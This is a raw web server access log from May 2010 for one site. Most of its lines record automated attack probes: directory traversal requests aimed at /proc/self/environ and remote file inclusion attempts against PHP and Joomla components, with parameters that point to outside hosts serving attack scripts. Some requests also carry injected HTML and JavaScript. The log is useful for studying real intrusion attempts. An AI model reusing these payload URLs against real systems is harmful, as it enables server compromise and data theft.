200.62.142.217 - - [06/May/2010:04:30:29 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
200.62.142.217 - - [06/May/2010:04:30:29 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
200.62.142.217 - - [06/May/2010:04:30:30 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
219.117.255.170 - - [06/May/2010:04:55:03 -0700] "GET /logs/access.log/?prefix=http://www.wewillinfest.com/cmd????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:04:55:05 -0700] "GET /logs/access.log/?prefix=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:04:55:06 -0700] "GET /logs/?prefix=http://www.wewillinfest.com/cmd????? HTTP/1.1" 200 5085 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:04:55:06 -0700] "GET /?prefix=http://www.wewillinfest.com/cmd????? HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:04:55:07 -0700] "GET /logs/access.log/?prefix=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:04:55:08 -0700] "GET /?prefix=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:04:55:08 -0700] "GET /logs/?prefix=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:04:55:18 -0700] "GET /logs/access.log/errors.php?error=http://www.wewillinfest.com/cmd????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:04:55:10 -0700] "GET /?prefix=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:04:55:14 -0700] "GET /errors.php?error=http://www.wewillinfest.com/cmd????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:04:55:14 -0700] "GET /logs/?prefix=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 5085 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:04:55:35 -0700] "GET /logs/errors.php?error=http://www.wewillinfest.com/cmd????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
67.218.116.132 - - [06/May/2010:04:57:01 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "elfagr.net"
216.129.119.43 - - [06/May/2010:04:58:19 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "elfagr.net"
67.222.129.26 - - [06/May/2010:04:59:22 -0700] "GET /content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.222.129.26 - - [06/May/2010:04:59:22 -0700] "GET /logs/access_091029.log%20%20//content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.222.129.26 - - [06/May/2010:04:59:22 -0700] "GET /logs//content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
164.77.228.201 - - [06/May/2010:04:59:25 -0700] "GET /logs/access.log%20%20//content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
164.77.228.201 - - [06/May/2010:04:59:33 -0700] "GET /content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
164.77.228.201 - - [06/May/2010:04:59:33 -0700] "GET /logs//content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
164.77.228.201 - - [06/May/2010:05:01:06 -0700] "GET /logs//content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
164.77.228.201 - - [06/May/2010:05:01:08 -0700] "GET /logs/access_091029.log%20%20//content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
164.77.228.201 - - [06/May/2010:05:01:16 -0700] "GET /content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.239.161.143 - - [06/May/2010:05:13:27 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
211.239.161.143 - - [06/May/2010:05:13:36 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
211.239.161.143 - - [06/May/2010:05:13:38 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
219.117.255.170 - - [06/May/2010:05:19:21 -0700] "GET /logs/access.log%22onmouseover=%22window.status='elfagr.net';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess.log%3C/a%3E%3Cbr/%3E...mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?....class.php?mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?HTTP/1.1"404-"...%3Cbr/?prefix=http://www.wewillinfest.com/cmd????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:05:19:21 -0700] "GET /logs/access.log%22onmouseover=%22window.status='elfagr.net';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess.log%3C/a%3E%3Cbr/%3E...mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?....class.php?mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?HTTP/1.1"404-"...%3Cbr/%3E%3Cspanclass=%22green/?prefix=http://www.wewillinfest.com/cmd????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:05:19:22 -0700] "GET /logs/access.log%22onmouseover=%22window.status='elfagr.net';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess.log%3C/a%3E%3Cbr/%3E...mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?....class.php?mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?HTTP/1.1"404-"...%3Cbr/%3E%3Cspanclass=%22green/?prefix=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:05:19:23 -0700] "GET /logs/access.log%22onmouseover=%22window.status='elfagr.net';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess.log%3C/a%3E%3Cbr/%3E...mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?....class.php?mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?HTTP/1.1"404-"...%3Cbr/?prefix=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:05:19:24 -0700] "GET /logs/access.log%22onmouseover=%22window.status='elfagr.net';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess.log%3C/a%3E%3Cbr/%3E...mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?....class.php?mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?HTTP/1.1"404-"...%3Cbr/?prefix=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:05:19:27 -0700] "GET /logs/access.log%22onmouseover=%22window.status='elfagr.net';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess.log%3C/a%3E%3Cbr/%3E...mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?....class.php?mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?HTTP/1.1"404-"...%3Cbr/errors.php?error=http://www.wewillinfest.com/cmd????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
99.39.2.249 - - [06/May/2010:05:19:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:05:19:34 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
219.117.255.170 - - [06/May/2010:05:19:35 -0700] "GET /logs/access.log%22onmouseover=%22window.status='elfagr.net';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess.log%3C/a%3E%3Cbr/%3E...mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?....class.php?mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?HTTP/1.1"404-"...%3Cbr/%3E%3Cspanclass=%22green/?prefix=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
219.117.255.170 - - [06/May/2010:05:19:45 -0700] "GET /logs/access.log%22onmouseover=%22window.status='elfagr.net';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess.log%3C/a%3E%3Cbr/%3E...mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?....class.php?mosConfig_absolute_path=http:/afrizal.com/sambc/samphpweb/tmp.txt?HTTP/1.1"404-"...%3Cbr/%3E%3Cspanclass=%22green/errors.php?error=http://www.wewillinfest.com/cmd????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "elfagr.net"
99.39.2.249 - - [06/May/2010:05:32:01 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:05:32:01 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:05:32:02 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:05:32:10 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:05:32:10 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:05:32:03 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:33:50 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:33:41 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:33:50 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:35:30 -0700] "GET /logs/access.log%20%20//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:35:30 -0700] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:35:30 -0700] "GET /components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
184.73.113.120 - - [06/May/2010:05:37:21 -0700] "GET /robots.txt HTTP/1.0" 200 37 "-" "taptubot *** please read http://www.taptu.com/corp/taptubot ***" "elfagr.net"
184.73.113.120 - - [06/May/2010:05:37:34 -0700] "GET / HTTP/1.0" 200 1449 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6; taptu-downloader) Gecko/20070725 Firefox/2.0.0.6" "elfagr.net"
184.73.113.120 - - [06/May/2010:05:37:30 -0700] "GET / HTTP/1.0" 200 1449 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "elfagr.net"
184.73.113.120 - - [06/May/2010:05:37:43 -0700] "GET /apple-touch-icon.png HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "elfagr.net"
184.73.113.120 - - [06/May/2010:05:37:41 -0700] "GET / HTTP/1.0" 200 1449 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.elfagr.net"
124.49.100.254 - - [06/May/2010:05:37:45 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [06/May/2010:05:37:55 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:38:05 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:37:56 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:37:56 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:37:59 -0700] "GET /components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:37:59 -0700] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:38:08 -0700] "GET /logs/access.log%20%20//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
184.73.113.120 - - [06/May/2010:05:38:10 -0700] "GET /iphone/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.elfagr.net"
124.49.100.254 - - [06/May/2010:05:38:02 -0700] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
184.73.113.120 - - [06/May/2010:05:38:13 -0700] "GET /mobile/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.elfagr.net"
184.73.113.120 - - [06/May/2010:05:38:16 -0700] "GET /m/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.elfagr.net"
58.230.162.220 - - [06/May/2010:05:38:10 -0700] "GET /components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:38:10 -0700] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
184.73.113.120 - - [06/May/2010:05:38:11 -0700] "GET /mobi/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.elfagr.net"
58.230.162.220 - - [06/May/2010:05:38:13 -0700] "GET /logs/access.log%20%20//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
209.62.121.162 - - [06/May/2010:05:39:25 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
209.62.121.162 - - [06/May/2010:05:39:37 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
174.142.68.135 - - [06/May/2010:05:39:40 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:40:06 -0700] "GET /components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:40:06 -0700] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
58.230.162.220 - - [06/May/2010:05:40:08 -0700] "GET /logs/access.log%20%20//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
80.71.1.68 - - [06/May/2010:05:47:56 -0700] "GET /logs/access_100114.log//main.php?x=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
80.71.1.68 - - [06/May/2010:05:47:48 -0700] "GET /main.php?x=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
80.71.1.68 - - [06/May/2010:05:47:48 -0700] "GET /logs//main.php?x=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
80.71.1.68 - - [06/May/2010:05:48:01 -0700] "GET /logs/access_091210.log//main.php?x=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.62.121.162 - - [06/May/2010:05:49:43 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
209.62.121.162 - - [06/May/2010:05:49:36 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
209.62.121.162 - - [06/May/2010:05:49:36 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
